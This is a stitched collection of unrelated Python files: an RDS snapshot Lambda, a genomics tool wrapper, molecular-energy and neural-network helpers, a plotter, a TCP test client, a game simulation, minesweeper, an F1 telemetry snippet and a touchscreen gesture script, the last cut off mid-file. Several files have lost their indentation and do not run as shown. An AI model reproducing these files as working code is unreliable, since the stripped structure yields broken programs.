# Creates manual snapshots of RDS Instances
import boto3
import datetime
import time
def lambda_handler(event, context):
#connecting to rds client interface
rds = boto3.client('rds')
#creates a placeholder list for the instances to be backed up
instances_to_backup = []
response = rds.describe_db_instances()
instances = response['DBInstances']
print("The total number of instances to be processed is %s " % len(instances))
for instance in instances:
engine = instance['Engine']
instances_to_backup.append(instance['DBInstanceIdentifier'])
print("This instance - %s has engine - %s " % (instance['DBInstanceIdentifier'], engine))
print("RDS snapshot backups stated at %s...\n" % datetime.datetime.now())
for bkup in instances_to_backup:
today = datetime.date.today()
rds.create_db_snapshot(
DBInstanceIdentifier = bkup,
DBSnapshotIdentifier = "{}-{:%Y-%m-%d}".format(bkup, today),
)
|
#!/usr/bin/python
## This uses an ephemeral working directory.
import optparse, os, shutil, sys, tempfile, glob, shlex, vcf, pysam, tarfile
from subprocess import *
import subprocess
CHUNK_SIZE = 2**20 #1mb
def cleanup_before_exit( tmp_dir ):
if tmp_dir and os.path.exists( tmp_dir ):
shutil.rmtree( tmp_dir )
def __main__():
parser = optparse.OptionParser()
parser.add_option('','--input', dest="inputF", action='store', type="string", default=None, help='')
parser.add_option('','--region', dest="regionF", action='store', type="string", default=None, help='')
parser.add_option( '', '--output', dest='outputF', action='store', type="string", default=None, help='')
##parser.add_option( '', '--out-dir', dest='output_dir', action='store', type="string", default=None, help='If specified, the output directory for extra files.' )
(options, args) = parser.parse_args()
ephemeral_dir = tempfile.mkdtemp(prefix="piq-")
if not os.path.exists(ephemeral_dir):
os.mkdir(ephemeral_dir)
input_dir = "%s/input" % ephemeral_dir
output_dir = "%s/output" % ephemeral_dir
config_dir = "%s/config" % ephemeral_dir
if not os.path.exists(output_dir):
os.mkdir(input_dir)
os.mkdir(output_dir)
os.mkdir(config_dir)
# region input file
linked_bed_name = "%s/regions.bed" % input_dir
if not os.path.exists(linked_bed_name):
os.symlink(options.regionF, linked_bed_name)
linked_bam_name="%s/sample.bam" % input_dir
if not os.path.exists(linked_bam_name):
os.symlink(options.inputF, linked_bam_name)
pysam.index(linked_bam_name)
input_config = open("%s/input.txt" % config_dir, 'w')
input_config.write("name\ttype\tfile\tdata\tgroup\n")
input_config.write("HS2\tregions\t%s\tHS\tDU_K562_HINT\n" % linked_bed_name)
input_config.write("DNase\treads\t%s\tDNASE\tDU_K562_HINT\n" % linked_bam_name)
input_config.close()
#hint_cmd = "rgt-hint --output-location %s/ %s/input.txt" % (output_dir, config_dir)
hint_cmd = "rgt-hint --output-location %s/ %s/input.txt" % (output_dir, config_dir)
print "hint cmd:%s" % hint_cmd
stdout = tempfile.NamedTemporaryFile( prefix="hint-stdout-", dir=ephemeral_dir)
stderr = tempfile.NamedTemporaryFile( prefix="hint-stderr-", dir=ephemeral_dir)
proc = subprocess.Popen( args=hint_cmd, stdout=stdout, stderr=stderr, shell=True, cwd=ephemeral_dir )
return_code = proc.wait()
if return_code:
stderr_target = sys.stderr
else:
stderr_target = sys.stdout
stderr.flush()
stderr.seek(0)
while True:
chunk = stderr.read( CHUNK_SIZE )
if chunk:
stderr_target.write( chunk )
else:
break
stderr.close()
stdout.close()
# copy files to final output locations
shutil.copy('%s/DU_K562_HINT.bed' % output_dir, options.outputF)
if __name__=="__main__": __main__()
|
from collections import OrderedDict
import logging
import os
import shutil
import subprocess
import simtk.unit as units
from intermol.desmond.desmond_parser import load, save
DES_PATH = ''
logger = logging.getLogger('InterMolLog')
# terms we are ignoring for now.
#'en': 'Raw Potential',
#'E_x': 'Extended En.',
unwanted = ['E_x','E_n','E_k','constraints',]
key_dict = {
'E_p': 'Potential',
'stretch': 'Bond',
'angle': 'Angle',
'dihedral': 'All dihedrals',
'pair_vdw': 'LJ-14',
'pair_elec': 'Coulomb-14',
'nonbonded_vdw': 'LJ (SR)',
}
def standardize_key(in_key):
if in_key in key_dict:
out_key = key_dict[in_key]
else:
out_key = in_key
return out_key
def get_desmond_energy_from_file(energy_file):
"""Parses the desmond energy file. """
with open(energy_file, 'r') as f:
data = []
types = []
# First line of enegrp.dat file contains total energy terms.
line = f.readline()
# Just to make sure the line is what we think it is.
if line.startswith('time=0.000000'):
terms = line.split()
terms = terms[1:-2] # Exclude time, pressure, and volume.
for term in terms:
key, value = term.split('=')
types.append(standardize_key(key))
data.append(float(value))
# Parse rest of file for individual energy groups.
for line in f:
if '(0.000000)' in line: # Time = 0.0
words = line.split()
if words[-1] == 'total':
continue
key = standardize_key(words[0])
if key:
types.append(key)
data.append(words[-1])
data = [float(value) * units.kilocalories_per_mole for value in data]
e_out = OrderedDict(zip(types, data))
# Discard non-energy terms.
for group in unwanted:
if group in e_out:
del e_out[group]
return e_out
def energies(cms, cfg, des_path):
"""Evalutes energies of DESMOND files
Args:
cms (str): Path to .cms file.
cfg (str): Path to .cfg file.
des_path (str): Path to DESMOND binaries.
Returns:
tot_energy:
energy_file:
"""
logger.info('Evaluating energy of {0}'.format(cms))
cms = os.path.abspath(cms)
cfg = os.path.abspath(cfg)
direc, cms_filename = os.path.split(cms)
cwd = os.getcwd()
name = os.path.splitext(cms_filename)[0]
energy_file = '%s/%s.enegrp.dat' % (direc, name)
if des_path and not (des_path == ''):
desmond_bin = os.path.join(des_path,'desmond')
elif os.environ.get('SCHRODINGER'):
desmond_bin = os.path.join(os.environ.get('SCHRODINGER'), 'desmond')
else:
raise Exception('Desmond binary not found')
# Use DESMOND To evaluate energy
# cd to directory of cms file so that files generated by desmond
# don't clog the working directory
os.chdir(direc)
if os.path.exists('trj'):
shutil.rmtree('trj')
cmd = [desmond_bin, '-WAIT', '-P', '1', '-in', cms, '-JOBNAME', name, '-c', cfg]
logger.debug('Running DESMOND with command:\n %s' % ' '.join(cmd))
with open('desmond_stdout.txt', 'w') as out, open('desmond_stderr.txt', 'w') as err:
exit = subprocess.call(cmd, stdout=out, stderr=err)
if exit:
logger.error('Energy evaluation failed. See %s/desmond_stderr.txt' % direc)
os.chdir(cwd) # return directory up a level again
raise Exception('Energy evaluation failed for {0}'.format(cms))
tot_energy = get_desmond_energy_from_file(energy_file)
# for now, remove the desmond '-out.cms' file.
outcms = cms[:-4] + '-out' + cms[-4:]
os.remove(outcms)
os.chdir(cwd) # return directory up a level again
return tot_energy, energy_file
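# A minimal, hedged usage sketch: the file names below are hypothetical; a real
# call needs an actual Desmond .cms/.cfg pair plus either a Desmond install
# path or the SCHRODINGER environment variable.
if __name__ == '__main__':
    tot_energy, energy_file = energies('system.cms', 'onepoint.cfg', des_path='/opt/desmond')
    for term, value in tot_energy.items():
        print(term, value)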
|
import networkx as nx
from omlt.neuralnet.layer import Layer
class NetworkDefinition:
def __init__(self, scaling_object=None, scaled_input_bounds=None):
"""
Create a network definition object used to create the neural network
formulation in Pyomo
Args:
scaling_object : ScalingInterface or None
A scaling object to specify the scaling parameters for the
neural network inputs and outputs. If None, then no
scaling is performed.
scaled_input_bounds : dict or None
A dict that contains the bounds on the scaled variables (the
direct inputs to the neural network). If None, then no bounds
are specified.
"""
self.__layers_by_id = dict()
self.__graph = nx.DiGraph()
self.__scaling_object = scaling_object
self.__scaled_input_bounds = scaled_input_bounds
def add_layer(self, layer):
"""
Add a layer to the network.
Parameters
----------
layer : Layer
the layer to add to the network
"""
layer_id = id(layer)
self.__layers_by_id[layer_id] = layer
self.__graph.add_node(layer_id)
def add_edge(self, from_layer, to_layer):
"""
Add an edge between two layers.
Parameters
----------
from_layer : Layer
the layer with the outbound connection
to_layer : Layer
the layer with the inbound connection
"""
id_to = id(to_layer)
id_from = id(from_layer)
assert id_to in self.__layers_by_id
assert id_from in self.__layers_by_id
self.__graph.add_edge(id_from, id_to)
@property
def scaling_object(self):
"""Return an instance of the scaling object that supports the ScalingInterface"""
return self.__scaling_object
@property
def scaled_input_bounds(self):
"""Return a dict of tuples containing lower and upper bounds of neural network inputs"""
return self.__scaled_input_bounds
@property
def input_layers(self):
"""Return an iterator over the input layers"""
for layer_id, in_degree in self.__graph.in_degree():
if in_degree == 0:
yield self.__layers_by_id[layer_id]
@property
def input_nodes(self):
"""An alias for input_layers"""
return self.input_layers
@property
def output_layers(self):
"""Return an iterator over the output layer"""
for layer_id, out_degree in self.__graph.out_degree():
if out_degree == 0:
yield self.__layers_by_id[layer_id]
@property
def output_nodes(self):
"""An alias for output_layers"""
return self.output_layers
def layer(self, layer_id):
"""Return the layer with the given id"""
return self.__layers_by_id[layer_id]
@property
def layers(self):
"""Return an iterator over all the layers"""
for layer_id in nx.topological_sort(self.__graph):
yield self.__layers_by_id[layer_id]
def predecessors(self, layer):
"""Return an iterator over the layers with outbound connections into the layer"""
if isinstance(layer, Layer):
layer = id(layer)
for node_id in self.__graph.predecessors(layer):
yield self.__layers_by_id[node_id]
def successors(self, layer):
"""Return an iterator over the layers with an inbound connection from the layer"""
if isinstance(layer, Layer):
layer = id(layer)
for node_id in self.__graph.successors(layer):
yield self.__layers_by_id[node_id]
def __str__(self):
return f"NetworkDefinition(num_layers={len(self.__layers_by_id)})"
|
#!/usr/bin/env python3
import sys, os, json, csv
from math import log
import matplotlib.pyplot as plt
import numpy as np
from scipy.interpolate import make_interp_spline, BSpline
# CREDITS
# Interpolation based upon: https://stackoverflow.com/questions/5283649/plot-smooth-line-with-pyplot
# Logarithmic scale: https://stackoverflow.com/questions/3242382/interpolation-over-an-irregular-grid
def compress_median(sub_list):
y_list = []
for point in sub_list:
y_list.append(point[1])
y_list.sort()
for point in sub_list:
if point[1] == y_list[int((len(y_list)-1)/2)]:
return point
def compress_max(sub_list):
y_list = []
for point in sub_list:
y_list.append(point[1])
y_list.sort()
for point in sub_list:
if point[1] == y_list[len(y_list)-1]:
return point
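# Worked example for the two helpers above: for the bin [[1, 5], [2, 1], [3, 9]]
# the sorted y-values are [1, 5, 9], so compress_median returns the point whose
# y equals 5 and compress_max the point whose y equals 9:
#   compress_median([[1, 5], [2, 1], [3, 9]])  -> [1, 5]
#   compress_max([[1, 5], [2, 1], [3, 9]])     -> [3, 9]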
def bins_sort(dataset, dtype, config_file): # try not to reuse global names within functions to avoid possible confusion
config = {}
with open(config_file, "r") as f:
config = json.load(f)
bins = [] # new cycle, creating bins
if config["x_limits_data"]:
graph_range = int(log(config["x_max_data"], 10) - log(config["x_min_data"], 10)) # getting graph range
else:
graph_range = 8 # x-axis (logarithmic) - from 0 to 10^8
if dtype == config['data']['floor']['file_name']: # adjusting graph range to match # bins according to data type
cpd = config["count_per_decade_floor"]
compress_floor_bool = True
else:
cpd = config["count_per_decade"]
compress_floor_bool = False
graph_range = graph_range*cpd
for i in range(graph_range): # creating a bin per unit in range
bins.append([])
for point in dataset: # filling the bins up
try:
if point is None: # let's avoid exceptions if possible! But how did that None happen in the first place?
continue # exceptions are the last resort when you DON'T KNOW what's wrong
# or the code that throws them is not yours to fix
if config["x_limits_data"]:
index = int(cpd*(log(point[0], 10) - log(config["x_min_data"], 10)))
else:
index = int(cpd*log(point[0], 10))
if 0 <= index and len(bins) > index: # let's avoid exceptions if possible!
bins[index].append(point)
except (TypeError, IndexError):
print("!!!", dtype, point); exit()
pass # here we throw some data out without knowing what or why was that
result = []
for binn in bins:
if compress_floor_bool:
#result.append(compress_max(binn))
result.append(compress_median(binn))
else:
result.append(compress_median(binn))
return result
def main_plotter(config_file): # all data processing and plotting for one configuration file
main_path = os.path.realpath(__file__)
config = {}
with open(config_file, "r") as f:
config = json.load(f)
keys = []
for dtype in config["data"]:
keys.append(dtype)
g_data = {} # global data array
cal_dir = os.path.join(os.path.split(main_path)[0], config['cal_dir'])
g_data['cal'] = []
for file in os.listdir(cal_dir):
with open(os.path.join(cal_dir, file)) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for line in csv_reader:
if 0 < line_count:
g_data['cal'].append([float(line[0]), float(line[1])])
line_count+=1
all_dir = os.path.join(os.path.split(main_path)[0], config['main_dir'])
for dtype in keys:
g_data[dtype] = []
file_base_name = config['data'][dtype]['file_name']
files = []
for file in os.listdir(all_dir):
if file_base_name in file: # FAILING
files.append(file)
for file in files:
with open(os.path.join(all_dir, file)) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for line in csv_reader:
if 0 < line_count:
g_data[dtype].append([float(line[0]), float(line[1])])
line_count+=1
for key in keys: # sort data type list by the x values
g_data[key].sort()
# print(g_data[keys[1]]) # debug only
if g_data['cal'] == []:
print("No calibrational files found, please make sure they are in the same directory")
quit()
for key in range(len(keys)): # calibrate
for line in range(len(g_data[keys[key]])):
g_data[keys[key]][line][1] = g_data[keys[key]][line][1] - g_data['cal'][line][1]
# print(keys)
if config["compressed"]:
for dtype in range(len(keys)): # cycle through data types
result = bins_sort(g_data[keys[dtype]], config['data'][keys[dtype]]['file_name'], config_file)
g_data[keys[dtype]] = result
if config["inverted"]:
for dtype in range(len(keys)):
for line in range(len(g_data[keys[dtype]])):
try:
g_data[keys[dtype]][line][1] = -g_data[keys[dtype]][line][1]
except TypeError:
pass
fig = plt.figure(figsize=config["size"])
plot = fig.add_subplot()
for dtype in range(len(keys)):
npi = int(config["size"][0] * 100 / 4) # number of points for interpolation ~~ less than 4 pixels per point
if config["data"][keys[dtype]]["show"]:
x = []
y = []
for line in g_data[keys[dtype]]:
try:
x.append(line[0])
y.append(line[1])
except:
pass
if config["interpolation"]:
xn = np.array(x)
yn = np.array(y)
logxn = np.log10(xn)
logxnew = np.linspace(logxn.min(), logxn.max(), npi)
xnew = np.power(10.0, logxnew)
spl = make_interp_spline(xn, yn, k=3) # type: BSpline
ynew = spl(xnew)
plot.plot(xnew, ynew, config["data"][keys[dtype]]["color"], label=config["data"][keys[dtype]]["name"])
else:
plot.plot(x, y, config["data"][keys[dtype]]["color"], label=config["data"][keys[dtype]]["name"])
plot.set_xlabel(config["x_name"])
plot.set_ylabel(config["y_name"])
plt.title(config["title"])
if config["x_limits_graph"]:
plt.xlim([config["x_min_graph"], config["x_max_graph"]])
if config["y_limits"]:
plt.ylim([config["y_min"], config["y_max"]])
plt.xscale('log')
plt.minorticks_on()
plt.grid(True, which="major", color="grey")
plt.grid(True, which="minor", axis='both', color="gainsboro")
plt.legend(loc="lower right")
name = config["title"].replace(" ", "_")
plt.savefig(f'{name}.png')
if config["interactive"]:
plt.show()
if __name__ == "__main__":
args = sys.argv
if len(args) == 1:
main_plotter("config.json")
else:
for i in range(1, len(args)):
main_plotter(args[i])
|
#!/usr/bin/env python3
#******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Unit Tests *
#******************************************************************************
import os, sys
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import UTIL.SYS, UTIL.TASK, UTIL.TCP
#############
# functions #
#############
# -----------------------------------------------------------------------------
def initConfiguration():
"""initialise the system configuration"""
UTIL.SYS.s_configuration.setDefaults([
["HOST", "127.0.0.1"],
["SERVER_PORT", "1234"]])
# -----------------------------------------------------------------------------
def createClient():
"""create the TCP client"""
client = UTIL.TCP.Client(UTIL.TASK.s_processingTask)
if not client.connectToServer(
UTIL.SYS.s_configuration.HOST,
int(UTIL.SYS.s_configuration.SERVER_PORT)):
sys.exit(-1)
return client
########
# main #
########
if __name__ == "__main__":
# initialise the system configuration
initConfiguration()
# initialise the console handler
consoleHandler = UTIL.TASK.ConsoleHandler()
# initialise the model
modelTask = UTIL.TASK.ProcessingTask(isParent=True)
# register the console handler
modelTask.registerConsoleHandler(consoleHandler)
# create the TCP client
LOG("Open the TCP client")
client = createClient()
# force termination of the server
LOG("force server termination...")
client.send("quit\n".encode())
|
# Copyright (C) 2020 Electronic Arts Inc. All rights reserved.
import pandas
class GameHistoryEntry:
def __init__(self, tick, state, player_identity_list, player_policy_list, player_action_list,
player_value_estimate_list, player_reward_list):
self.tick = tick
self.state = state
self.player_identity_list = player_identity_list
self.player_policy_list = player_policy_list
self.player_action_list = player_action_list
self.player_reward_list = player_reward_list
self.player_value_estimate_list = player_value_estimate_list
def Show(self):
print('tick:', self.tick, 'state:', self.state, 'identity:', self.player_identity_list,
'policy:', self.player_policy_list, 'action:', self.player_action_list, 'reward:',
self.player_reward_list, 'value:', self.player_value_estimate_list)
class GameEvent:
def __init__(self, tick, event_type, source_player_name, target_player_name):
self.tick = tick
self.event_type = event_type
self.source_player_name = source_player_name
self.target_player_name = target_player_name
class GameEventHistory:
def __init__(self):
self.event_list = []
def AddEvent(self, e):
self.event_list.append(e)
def EventMatches(self, e, event_type=None, min_tick=None, max_tick=None,
source_player_name=None, target_player_name=None):
if event_type is not None and e.event_type != event_type:
return False
if min_tick is not None and e.tick < min_tick:
return False
if max_tick is not None and e.tick > max_tick:
return False
if source_player_name is not None and e.source_player_name != source_player_name:
return False
if target_player_name is not None and e.target_player_name != target_player_name:
return False
return True
def FindEvents(self, event_type=None, min_tick=None, max_tick=None, source_player_name=None,
target_player_name=None):
l = []
for e in self.event_list:
if self.EventMatches(e, event_type, min_tick, max_tick, source_player_name,
target_player_name):
l.append(e)
return l
def FindMostRecentEvent(self, event_type=None, min_tick=None, max_tick=None,
source_player_name=None, target_player_name=None):
for e in self.event_list[-1::-1]:
if self.EventMatches(e, event_type, min_tick, max_tick, source_player_name,
target_player_name):
return e
return None
def EventListToDataFrame(self, l=None):
if l is None:
l = self.event_list
df = pandas.DataFrame(columns=['tick', 'event_type', 'source_player', 'target_player'])
i = 0
for e in l:
df.loc[i, 'tick'] = e.tick
df.loc[i, 'event_type'] = e.event_type
df.loc[i, 'source_player'] = e.source_player_name
df.loc[i, 'target_player'] = e.target_player_name
i += 1
return df
class Simulation:
NUM_AGENTS_INVOLVED = 0 # must override in derived class
WIN_REWARD = 1.0
LOSS_REWARD = -1.0
def __init__(self, players, verbosity=0):
self.players = players
self.verbosity = max(0, verbosity)
self.tick = 0
self.player_identity_list = [None] * len(players) # subclass should fill
self.game_state_history = []
self.game_state_vector = None
self._WipePlayerActionsAndRewardsForThisTick()
self.game_event_history = GameEventHistory()
def update(self, record_game_state=True):
if self.verbosity > 1:
self.ShowState()
self._WipePlayerActionsAndRewardsForThisTick()
self.CustomTick()
if record_game_state:
self._AddGameStateHistoryForThisTick()
self.tick += 1
def Simulate(self):
# this method need not be overridden and can be called from a different context if needed
if self.verbosity:
print('Simulation.Simulate() verbosity', self.verbosity)
while not self.IsSimulationComplete():
self.update()
if self.verbosity:
self.ShowState()
def _WipePlayerActionsAndRewardsForThisTick(self):
self.player_action_list = [None] * len(self.players)
self.player_reward_list = [0.0] * len(self.players)
self.player_policy_list = [None] * len(self.players)
self.player_value_estimate_list = [0.0] * len(self.players)
def _AddGameStateHistoryForThisTick(self):
h = GameHistoryEntry(self.tick, self.GetHashableGameStateVector(),
self.player_identity_list, self.player_policy_list,
self.player_action_list, self.player_value_estimate_list,
self.player_reward_list)
self.game_state_history.append(h)
def CustomTick(self):
# override this method with simulation specific logic
pass
def IsSimulationComplete(self):
# should return true if simulation is complete
raise NotImplementedError
def ShowState(self):
# helper method for debugging
raise NotImplementedError
def GetHashableGameStateVector(self):
# should return game state *from before this tick*
# *must be hashable for easy table generation, etc, best way is to convert to tuple*
raise NotImplementedError
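# A hedged usage sketch of GameEventHistory: record a couple of events, filter
# them, and dump them to a DataFrame. The 'attack' event type and player names
# are made up for illustration.
if __name__ == '__main__':
    history = GameEventHistory()
    history.AddEvent(GameEvent(tick=1, event_type='attack', source_player_name='a', target_player_name='b'))
    history.AddEvent(GameEvent(tick=5, event_type='attack', source_player_name='b', target_player_name='a'))
    print(len(history.FindEvents(event_type='attack', min_tick=2)))  # 1
    print(history.FindMostRecentEvent(event_type='attack').tick)     # 5
    print(history.EventListToDataFrame())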
|
'''
minesweeper in the console... works pretty ok
'''
import numpy as np
from timeit import default_timer
class Minesweeper:
"""class represents the game & associated metadata"""
def __init__(self, rows=10, cols=8, mines=None):
self.rows = rows
self.cols = cols
# board is rows * cols; game state is stored in self._state[0:4] as ndarray
# also aliased as self.mines, etc. for convenience
self._state = np.zeros((4, rows, cols), dtype='uint8')
self.mines = self._state[0]
self.counts = self._state[1]
self.viewed = self._state[2]
self.flags = self._state[3]
if mines is None:
self.mine_qty = rows * cols // 8
else:
assert isinstance(mines, int)
self.mine_qty = mines
mines_on_board = 0
# place mines on board at random
while mines_on_board < self.mine_qty:
y = np.random.randint(0, rows)
x = np.random.randint(0, cols)
if self.mines[y, x] == 0:
self.mines[y, x] = 1
mines_on_board += 1
# build counts (numbers that show on each square when viewed)
for row in range(rows):
for col in range(cols):
if not self.mines[row, col]:
self.counts[row, col] = self.count_mines(row, col)
# otherwise zero
self.start_time = default_timer()
self.play()
def show_board(self):
"""print board to console, does not affect game state"""
print('timer running: {:.0f} seconds'.format(default_timer() - self.start_time))
print('board: mines={} used_flags={}'.format(self.mine_qty, np.sum(self.flags)))
print()
print('* ' + ' '.join([str(i) for i in range(self.cols)]) + ' *')
for row in range(self.rows):
current_row = []
for col in range(self.cols):
# if flagged, show flag
if self.flags[row, col]:
current_row.append('x')
# if checked, show count
elif self.viewed[row, col]:
count = self.counts[row, col]
if count:
current_row.append(str(count))
else:
current_row.append('.')
# otherwise blank
else:
current_row.append(' ')
# print row#, assembled row, border
print(' '.join([str(row)] + current_row + ['*']))
# border
print('* ' * (self.cols + 2))
def probe(self, row, col):
"""test point (row, col); return True if game continues, else False"""
if not self.valid_loc(row, col):
print('invalid location')
return True
if self.viewed[row, col] == 1:
print('repeat move is invalid')
return True
# for valid moves, mark point as viewed:
self.viewed[row, col] = 1
# if row, col is a mine
if self.mines[row, col]:
print('you lose!')
return False
# if counts == 0: safe square, expand it recursively
if self.counts[row, col] == 0:
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
new_col = col + i
new_row = row + j
if self.valid_loc(new_row, new_col) and not self.viewed[new_row, new_col]:
self.probe(new_row, new_col)
return True
def valid_loc(self, row, col):
return (0 <= col < self.cols) and (0 <= row < self.rows)
def count_mines(self, row, col):
"""count mines in squares adjacent to (row, col)"""
count = 0
for i in [-1, 0, 1]:
for j in [-1, 0, 1]:
if i == j == 0:
continue
# print(count)
# print(x + i, y + j)
# print(self.board[x + i, y + j])
new_row, new_col = row + i, col + j
if self.valid_loc(new_row, new_col):
count += self.mines[new_row, new_col]
return count
def play(self):
"""get player input and change game state"""
game_on = True # whether game continues
win = False
while game_on:
self.show_board()
print('Enter coordinate for next move:')
c = input('x_coordinate 0-{}: '.format(self.cols - 1))
r = input('y_coordinate 0-{}: '.format(self.rows - 1))
try:
r = int(r)
c = int(c)
except ValueError:
print('\n' * 8)
input('no, use numbers fool')
continue
# get move type
print('''
Select move, then press enter.
probe <blank>
flag f / flag / .
back b
''')
move_type = input()
if move_type.lower() in ['f', 'flag', '.']:
self.flags[r, c] = 1 - self.flags[r, c]
elif move_type.lower() in ['b', 'back']:
continue
else:
game_on = self.probe(r, c)
if np.array_equal(self.flags, self.mines):
win = True
break
if np.array_equal(self.viewed, np.ones((self.rows, self.cols), 'uint8') - self.mines):
win = True
break
else:
continue
if win:
print('you won eh')
print()
print(' ####### ')
print(' ## ## ')
print(' |[o] [o]| ')
print(' | A | ')
print(' \ === / ')
print(' ---- ')
else:
print('*wanh wah wah you are dead*')
print(' ______ ')
print(' / \ ')
print(' | x x |')
print(' | n |')
print(' \ / ')
print(' ==== ')
print(' \__/ ')
print()
print('game over eh')
print()
replay = input('press enter to replay...')
if 'n' in replay.lower():
return None
self.__init__()
if __name__ == '__main__':
m = Minesweeper()
|
import fastf1 as ff1
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
from matplotlib import cm
import numpy as np
ff1.Cache.enable_cache('../doc_cache') # replace with your cache directory
session = ff1.get_session(2021, 'Austrian Grand Prix', 'Q')
laps = session.load_laps(with_telemetry=True)
lap = laps.pick_fastest()
tel = lap.get_telemetry()
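# A hedged sketch of what the LineCollection/colormap imports above suggest:
# colour the fastest lap's X/Y track position by speed. The column names
# ('X', 'Y', 'Speed') are assumed from fastf1's telemetry schema.
x = tel['X'].to_numpy()
y = tel['Y'].to_numpy()
speed = tel['Speed'].to_numpy()
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = LineCollection(segments, cmap=cm.plasma,
                    norm=plt.Normalize(speed.min(), speed.max()))
lc.set_array(speed[:-1])
fig, ax = plt.subplots()
ax.add_collection(lc)
ax.autoscale()
ax.set_aspect('equal')
fig.colorbar(lc, ax=ax, label='Speed [km/h]')
plt.show()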
|
"""
Python Script for adding 1 & 2 finger multitouch gestures to implement
a right click option with Touchscreens in the Ubuntu unity environment.
This is implemented with the evdev Python library on an ELAN touchscreen.
Currently implements 2 types of right click options:
1 finger long touch: Timeout of 1.5 seconds, movement cancels action
2 finger tap: movement cancels action
"""
from evdev import InputDevice, ecodes, UInput, list_devices
from pymouse import PyMouse
from threading import Timer
import subprocess
import argparse
class TrackedEvent(object):
"""
Class for multitouch event tracking.
Track position, movement, slots used (total number of fingers in gesture),
timing of long presses, and event completion.
"""
def __init__(self, dev, abilities, var_x, var_y,
use_pymouse=False, long_press_workaround=False):
""" Initialize tracking attributes. """
self.dev = dev
self.abilities = abilities
self.long_press_workaround = long_press_workaround
self.vars = {'ABS_X': var_x, 'ABS_Y': var_y}
self.position = {'ABS_X': None, 'ABS_Y': None}
self.fingers = 0
self.total_event_fingers = 0
self.discard = 0
self.moved = 0
self.track_start = None
self.click_delay = 1.5
self.long_pressed = False
if use_pymouse:
self.mouse = PyMouse()
else:
self.mouse = None
def add_finger(self):
""" Add a detected finger. """
self.fingers += 1
self.total_event_fingers = self.fingers
def remove_fingers(self):
""" Remove detected finger upon release. """
if self.fingers == 1:
print('Total Fingers used: ', self.total_event_fingers)
self.fingers -= 1
if (self.fingers == 0 and
self.total_event_fingers == 2 and
self.moved == 0):
self.total_event_fingers = 0
self._initiate_right_click()
elif (self.fingers == 0 and
self.total_event_fingers == 1 and
self.moved == 0):
self.total_event_fingers = 0
try:
self.track_start.cancel()
self.track_start.join()
except AttributeError: # capture Nonetype track_start
pass
if self.long_pressed and not self.long_press_workaround:
self._initiate_right_click()
if self.fingers == 0:
self.discard = 1
def position_event(self, event_code, value):
""" tracks position to track movement of fingers """
if self.position[event_code] is None:
self.position[event_code] = value
else:
if abs(self.position[event_code] - value) > self.vars[event_code]:
self._moved_event()
if (self.fingers == 1 and self.position['ABS_X'] and
self.position['ABS_Y'] and self.track_start is None):
self._trackit()
def _trackit(self):
""" start timing for long press """
self.track_start = Timer(self.click_delay, self._long_press)
self.track_start.start()
print('tracking started!!!')
def _long_press(self):
if self.fingers == 1 and self.moved == 0:
self.long_pressed = True
if self.long_press_workaround:
subprocess.call(['xinput', '--disable', self.dev.name])
subprocess.call(['xinput', '--enable', self.dev.name])
self._initiate_right_click()
def _moved_event(self):
""" movement detected. """
self.moved = 1
def _initiate_right_click(self):
""" Internal method for initiating a right click at touch point. """
if self.mouse is None:
with UInput(self.abilities) as ui:
ui.write(ecodes.EV_ABS, ecodes.ABS_X, 0)
ui.write(ecodes.EV_ABS, ecodes.ABS_Y, 0)
ui.write(ecodes.EV_KEY, ecodes.BTN_RIGHT, 1)
ui.write(ecodes.EV_KEY, ecodes.BTN_RIGHT, 0)
ui.syn()
else:
x, y = self.mouse.position()
self.mouse.click(x, y, 2)
def initiate_gesture_find(use_pymouse=False, long_press_workaround=False):
"""
This function will scan all input devices until it finds an
ELAN touchscreen. It will then enter a loop to monitor this device
without blocking its usage by the system.
"""
for device in list_devices():
dev = InputDevice(device)
if (dev.name == 'ELAN Touchscreen') or \
(dev.name == 'Atmel Atmel maXTouch Digitizer'):
break
Abs_events = {}
abilities = {ecodes.EV_ABS: [ecodes.ABS_X, ecodes.ABS_Y],
ecodes.EV_KEY: (ecodes.BTN_LEFT, ecodes.BTN_RIGHT,
ecodes.BTN_TOUCH)}
# Assuming QHD screen on my Yoga 2 Pro as default for resolution measures
res_x = 13 # touch unit resolution # units/mm in x direction
res_y = 13 # touch unit resolution # units/mm in y direction
# would be weird if above resolutions differed, but will treat generically
codes = dev.capabilities()
for code in codes:
if code == 3:
for type_code in codes[code]:
human_code = ecodes.ABS[type_code[0]]
if human_code == 'ABS_X':
vals = type_code[1]
abilities[ecodes.EV_ABS][0] = (ecodes.ABS_X, vals)
res_x = vals[-1]
elif human_code == 'ABS_Y':
vals = type_code[1]
abilities[ecodes.EV_ABS][1] = (ecodes.ABS_Y, vals)
res_y = vals[-1]
Abs_events[type_code[0]] = human_code
# Average index finger width is 16-20 mm, assume 20 mm
# touch resolution noise assumed at 10% (5% radius), so 1.0 mm by default
# this seemed reasonable from my own trial tests
var_x = 1.0 * res_x # variability in movement allowed in x direction
var_y = 1.0 * res_y # variability in movement allowed in y direction
MT_event = None
for event in dev.read_loop():
if event.type == ecodes.EV_ABS:
if MT_event is None:
MT_event = TrackedEvent(dev, abilities, var_x, var_y,
use_pymouse, long_press_workaround)
event_code = Abs_events[event.code]
if event_code == 'ABS_X' or event_code == 'ABS_Y':
MT_event.position_event(event_code, event.value)
elif event_code == 'ABS_MT_TRACKING_ID':
if event.value == -1:
MT_event.remove_fingers()
if MT_event.discard == 1:
MT_event = None
else:
MT_event.add_finger()
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Implements right click options on Linux Systems via Touchscreen')
parser.add_argument(
"--use_pymouse",
help="Uses PyMouse for initiating clicks instead of UInput",
action="store_true")
parser.add_argument(
"--long_press_workaround",
